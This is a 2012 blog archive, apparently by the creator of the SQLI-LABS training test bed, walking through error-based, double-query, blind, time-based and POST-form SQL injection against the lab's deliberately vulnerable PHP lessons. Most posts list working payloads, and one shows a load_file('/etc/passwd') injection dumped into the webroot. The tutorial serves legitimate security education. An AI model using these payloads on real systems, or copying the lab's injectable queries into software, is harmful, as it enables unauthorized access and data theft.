From Dummy to Dummies: June 2012

Saturday, June 30, 2012

CONFIDENCE BOOSTER DOZE

Thanks a ton to everyone who are watching/following the videos series closely and also appreciating it. Another link on Facebook posted by Vivek Ramachandran, I am really really touched with the wonderful words from the Guru himself..... thanks a ton.

SQLI-LABS SERIES PART 12

In the last part we started to explore the error based sql injections in the POST parameters. We were able to use the UNION statements to dump the database of the test bed. In a situation when the database does not interact with the web page and only was the database displays some info on the web page is through the mysql errors. Then in this case the fastest way to extract the info is through use of type caste errors involving sub queries also referred to as double queries, but MYSQL is very flexible and returns empty rows rather than throwing an error, so infosec guru's figured out some combinations of functions, if combined make sql queries which pass the compile time check but throw run-time errors. With the errors dumps the useful info which is needed.

DOUBLE QUERY INJECTIONS

CAUTION: This is for educational purposes only, please do not use the skills you gain from following the video lessons, blog to harm or test sites on the internet for whom you do not have permissions. Doing so is illegal. I do not support these sort of activities and would advice you all to stay away from the same... If you do so you are solely responsible for your actions, you have been warned.

As these involve sub query injections, the focus is to use the internal query to dump the info we want and wrap around a query which is syntactically correct, passing the compile time checks and produces error at run time and in process spit the core query as part of error.

In MYSQL this is achieved by using combination of count() and group by clause. In my personal understanding issue happens when the aggregate functions produce dynamic entries and group by clause clubs them and with the next round of aggregate function finds the values changed, causing duplicate entry issues. We discussed the same during the part 6. There the injection point was in GET parameter, and in this we used the POST parameter.

For detailed instructions, you can follow the video.

Basic query to cause injections :

Less-13 line number 57
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
') or ('1')=('1 Will work nicely if injected in username and password field. username = (' ') or ('1')=('1 ') AND password = (' ') or ('1')=('1 ')
') or 1=1 --+ Will also work only in one field. username = (' ') or 1=1 --+ ' commented out
') or 1=1 # will also work only in one field. username = (' ') or 1=1 # ' commented out

Less-14 Line 57,58,59
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

" or "1"="1 Will work nicely. username = " " or "1"="1 " AND password = " " or "1"= "1 "
" or 1=1 --+ Will also work. username = " " or 1=1 --+ " commented out
" or 1=1 # will also work. username = " " or 1=1 # " commented out

Thursday, June 28, 2012

SQLI-LABS SERIES PART-11

Thank you all your feedback's and the responses. I am highly motivated to complete this series and start with a new one soon after.

Today we will discuss about the injections in the forms. In the last 11 lessons of the series we discussed injections via the GET request. When I had started to learn this topic, I realized that a lot of stuff was available on internet for the GET based injections but POST injections were rarely discussed. That increased curiosity in me much and this was the point when i started this lab. The forms , lesson 11 to 20 are different implementations similar to GET method. We would cover

Error based injections
Double Query injections
Boolean based Blind injections
Time based Blind Injections
Injections in update query
Injections in the Headers
Injections in cookies

POST BASED INJECTIONS

In general, nothing changes with the change in injection point. The logic for injection remains the same, the process remains the same. In a general scenario we take up Less-11 and 12 for this. As the page displays a login field. therefore we can build our first sudo query which would be behind the scene as

SELECT * FROM table WHERE username="$uname" and password="$password".

The basic steps involved in the testing to exploitation are:

1. Fuzzing: Try to give random inputs to all points where it is accepted, be creative and send the values which the developer has failed to visualize. Objective is to try to break the underlying query and gain more insite on how the query is formulated by reviewing error.

2. Then try to fix the query by either providing the extra characters to balance off what we injected to break the query or comment off rest of query in such a way that it gets fixed.

3. Once we successfully achieved the above, we effectively get the left side, and right side of the injection and sql statement we inject in between these gets executed on backend.

As discussed in the previous post on error based injections, we used the UNION SELECT to dump the DB because the database layer was interacting with the web page and columns from table were visible on screen. same way we can see that a successful login leads to display of the username and password.

This can then be used to dump the database.

Less-11 line number 57
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
' or '1'='1 Will work nicely if injected in username and password field. username = ' ' or '1'='1 ' AND password = ' ' or '1'='1 '
' or 1=1 --+ Will also work only in one field. username = ' ' or 1=1 --+ ' commented out
' or 1=1 # will also work only in one field. username = ' ' or 1=1 # ' commented out

Less-12 Line 57,58,59
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

") or ("1")=("1 Will work nicely. username = (" ")or ("1")=("1 ") AND password = (" ")or ("1")=("1 ")
") or 1=1 --+ Will also work. username = (" ")or 1=1 --+ ") commented out
") or 1=1 # will also work. username = (" ") or 1=1 # ") commented out

Tuesday, June 26, 2012

EXCITED AND FIRING ALL GUNS

Thanks a ton to everyone,who is watching the series and also those who commented. A special thanks to Vivek Ramachandran for sharing link on Facebook and writing nice comments about it. Thanks a ton Vivek, it means a lot to me. I am motivated and excited to fire all guns. Never expected this kind of response

Monday, June 25, 2012

SQLI-LABS SERIES PART-10

In the last posts we discussed about different types of SQL injections: (Click the links to follow)

Today we will take it further and discuss the use of outfile function or dumpfile function.

CAUTION: This is for educational purposes only, please do not use the skills you gain from following the video lessons, blog to harm or test sites on the internet for whom you do not have permissions. Doing so is illegal. I do not support these sort of activities and would advice you all to stay away from the same... If you do so you are solely responsible for your actions, you have been warned.

USING THE OUTFILE/DUMPFILE

Well if the connection user which is configured to run the queries to the back-end DB has the privileges to write to file system (webroot of server or any other folder under it), then in that case, we can build queries and use the inbuilt function called outfile or dumpfile.

example query: select * from table into outfile "path-to-file/filename"

There are two functions which can be used in this case, outfile and dumpfile. With dumpfile, it dumps only one row without any formatting details. This is specially important if you are playing with binary data. The outfile preserves the formatting, carriage returns, etc and dumps multiple rows.

To practice this you can follow the Less-7 from the labs.

same way we can use mysql to read files from the file system. for that we can use the function called load_file(). By default we cannot execute system commands through mysql, but if mysql is misconfigured, then can lead to upload of User Defined Functions which can lead to a complete compromise of server.

example injection may look like:

' union select 1,load_file("/etc/passwd"),3 into dumpfile "/var/www/test.txt"

Less -7 Line number 31

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

1'))+or+1=1--+ -- Basic injection to detect sqli

Sunday, June 24, 2012

SQLI-LABS SERIES PART 9

TIME BASED INJECTIONS

In the previous post, we discussed the basics of Blind injections and started to explore Boolean based blind injections. In this blog post we would continue with the Blind injections and discuss TIME based injections.

In certain web web applications, which are vulnerable but does not disclose errors, nor does the database display any fields on the web pages and neither does it react to physical boolean queries of yes and no meaning we cannot physically differentiate between true and false,

in that case, we can use time to distinguish between true and false. This can be achieved by using sleep() function. This function is non cpu intensive and if query is true will wait for some time before returning a response and respond quickly if false. This time difference in page reload gives us the correct characters one by one.

Another way to do time based injections is by use of heavy queries (benchmark queries) which are intensive and consume some CPU cycles if query returns true and are quick if it is false. It is always good to use sleep() function.

Less - 9 line number 29
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'+and+sleep(10)+--+ -- Basic injection to detect sqli
1'+and+if(1=1, sleep(10), null)+--+ -- Returns True ( page load is approx 10 sec)
1'+and+if(1=0, sleep(10), null)+--+ -- Returns False (page load is almost instant)

Less-10 line number 28,29

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"+and+sleep(10)+--+ -- Basic injection to detect sqli
1"+and+if(1=1, sleep(10), null)+--+ -- Returns True ( page load is approx 10 sec)
1"+and+if(1=0, sleep(10), null)+--+ -- Returns False (page load is almost instant)

Hope this makes some sense, after all I am a dhakkan.

SQLI-LABS SERIES PART-8

BLIND INJECTIONS

Continuing the SQLI-LABS series, we discussed the Error based injections, and discussed Union type injections and double query injections. In today's post we would be discussing Blind injections. Blind injections got this name because during blind injections, you do not get any help from the application. All the errors are suppressed from the end user.
Therefore complete injection is based on a guess. The tester does not see any error responses to tune his injections.
Blind Injections can be classified mainly into two categories:

Boolean based Blind injections
Time based Blind injections.

Boolean Based

As per wikipedia "In computer science, the Boolean or logical data type is a data type, having two values (usually denoted true and false), intended to represent the truth values of logic and Boolean algebra. It is named after George Boole, who first defined an algebraic system of logic in the mid 19th century".

Well in certain web applications, you can witness that the database does not write any fields on the web page or somehow union injections do not work, and the mysql errors are also not displayed on the page, so technically there is no direct channel through which the database writes on web page. In this case the only option left is to use blind injections. With Blind injections we cannot dump the strings or names directly but need to deduce names character by character.

In general when we were dealing with error based injections, we ask the database questions like, dump us the database name, version, table names etc. In case of blind injections, we change the way we ask questions to database and rephrase questions like is the first letter of the database this? and answer comes out as either yes or no or true or false. Check the video at the end of the post for more detailed explanation.

Less-8 line number 29
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

basic injection example:
1' AND '1'='1 -- returns true

1' AND '1'='0 -- returns false

Therefore by evaluating the strings character by character we can dump the complete database.

SQLI-LABS SERIES PART 6,7

DOUBLE QUERY INJECTIONS OR SUBQUERY INJECTIONS.

In the last 5 parts of the series we learnt about some basics about the error based injections and used the UNION statements to dump the database using the web application. Well we could achieve it because the database was interacting with web page and some database fields were visible on the web pages. A basic injection looked like id=-1 union all select 1,2,3 --+ and we were able to see the username name and password field displaying value 2 and 3. For detailed explanation watch video's 2 to 5.

In a scenario when the database does not directly display columns on the wep page, then the above technique cannot be used. To understand this better you can check Lesson 5 or 6 of the sqli-labs series.

As we see we just see a generic message "You are in". Therefore in this case, the database is not displaying any files on the page. In this case only way the database is displaying into is through the mysql error. (note: I am interchangeably using the Lesson 5 and 6, only thing different is way to produce error)

So primary objective in a double query injection is to create a query injection in such a way which is syntactically correct (correct at compile time) but produce an error at run time thereby spitting useful information in the errors. In case of MSSQL server cast errors dumps the info but in case of MYSQL, being flexible returns empty rows. Therefore some genius researchers found a combination of use of aggregate functions, group by clause, and use of random functions to produce errors are run time due to dynamic calculations involved in random function and aggregate function like count.

Hope this makes some sence, after all I am a dhakkan.

Less-5 line number 29

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

' or '1'='1 Will work nicely. id = ' ' or '1'='1 ' LIMIT 0,1
' or 1=1 --+ Will also work. id = ' ' or 1=1 --+ ' commented out
' or 1=1 # will also work. id = ' ' or 1=1 # ' commented out

Less-6 line number 28,29

$id = '"'.$id.'"';

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

" or "1"="1 Will work nicely. id = " " or "1"="1 " LIMIT 0,1
" or 1=1 --+ Will also work. id = " " or 1=1 --+ " commented out
" or 1=1 # will also work. id = " " or 1=1 # " commented out

Friday, June 22, 2012

SQLI-LABS SERIES PART - 2,3,4,5

In the first part of the series we downloaded the PHP code files and installed them on the backtrack machine or under XAMPP on windows.

In today's lesson We would start with the Error based SQL injections.

What exactly is SQL injection?

SQL injection is a technique often used to attack databases through a website. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. -- source wikipedia

How does SQL injection happen?

Let us take the example of Less-1, the webpage is taking an input through the parameter "ID" and passes it on to the backend database by constructing a query in real time.

ERROR BASED SQL INJECTION

Error Based Sql injection is called so because in this errors are being displaded on the web page, and these errors are used to discover the underlying query.

Less-1
if you open the source of the index.php under Less-1, you would see on line 29
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
in here we see that the variable $id is being wrapped around single quotes.
id = ' $id ' , Now when a tester provides a ' or 1=1 then it becomes id = ' ' or 1=1 ' thereby effectively evaluating the complete query as id= empty string or (evaluate one equals one) and escaping the data boundary and getting executed as code. As there is a quote on right side which we either need to handle or comment out remaining part of query.

' or '1'='1 Will work nicely. id = ' ' or '1'='1 ' LIMIT 0,1
' or 1=1 --+ Will also work. id = ' ' or 1=1 --+ ' commented out
' or 1=1 # will also work. id = ' ' or 1=1 # ' commented out

Less-2 line number 31,32

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

or 1=1 Will work nicely. id = or 1=1 LIMIT 0,1
or 1=1 --+ Will also work. id = or 1=1 --+
or 1=1 # Will also work. id = or 1=1 #

Less-3 line number 31

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

' ) or ('1')=('1 Will work nicely. id = (' ') or '1'=('1 ') LIMIT 0,1
' ) or 1=1 --+ Will also work. id = (' ') or 1=1 --+ ') commented out
' ) or 1=1 # will also work. id = (' ') or 1=1 # ') commented out

Less-4 line number 28,29

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

") or ("1")=("1 Will work nicely. id = (" ")or ("1")=("1 ") LIMIT 0,1
") or 1=1 --+ Will also work. id = (" ")or 1=1 --+ ") commented out
") or 1=1 # will also work. id = (" ") or 1=1 # ") commented out

hope you all like it.

SQLI-LABS SERIES PART-1

Issue with me is that I have a very unconventional way of self learning and unless the core concepts are clear, things fall logically in place and I have answer to all how and why questions in my head, cannot accept and retain those thopics.

Well for me my good friend Alper has always been there whenever stupid ideas pop'ed into my head and I needed someone to share, discuss and to show me the right path. Pranab has always supported me in the odd hours of research and learning, when we are trying to understand things....

Shashank another good friend of mine pushed me to share my ideas and know how with others.... so revival of my blog is because of him. Not to forget my buddy Neeraj who was with me in all the ups and downs of my life....(Miss you uncle.................)

Thank a ton to all my friends. It is only because of them that I am what I am today.

SQLI-LABS SERIES

So here I am sharing the little I know....
Plans are big. If audience likes the stuff, then I will invest more time to share and bring forward more subjects.....

I started with SQL Injections...... why SQL injections. Well there is a lot talked about on this subject on internet from basic to advanced stuff but no single resource explains the logic behind the scene for all types in 1 place , how it works and why it works and most are like do this then this and then this but why it needs to be done like that is not explained...........

SQLI-LABS is my attempt to explain the basics involved in SQL injections. I tried to be a DHAKKAN during my explainations.... Hope you all like them.

SQLI-LABS is a test bed of various lessons to explain and learn different types of SQL injections.

Error Based Sql Injections - Union select type.
Error Based Sql Injections - Double Query type.
Boolian Based Blind Injections.
Time Based Blind Injections.
Dumping the DB using outfile / Dumpfile.
POST based Sql injections Error based type - union select.
POST based Sql injections - Double injection type.
POST based Blind injections -Boolian / Time based.
Injection in the UPDATE query.
Injection in the Headers.
Injection in cookies.

Download the test bed from https://github.com/Audi-1/sqli-labs

Installation video can be found at http://www.youtube.com/watch?v=NJ9AA1_t1Ic

Rediscovering myself

Hi All,

well over past few years, i had lost myself in the crowd.....

and had just become a machine, but thanks to my good friend, Shashank Dixit who pushed me to rediscover myself.

Rejuvenated with the newly gained energy, and backing by a lot of good friends. Special thanks to Alper Celik, Pranab Kumar, Shashank dixit, Krishna Kumar and many more... I am back with a promise to myself that I will try to help others in the field of infosec as much as i can.....Even more than ever before...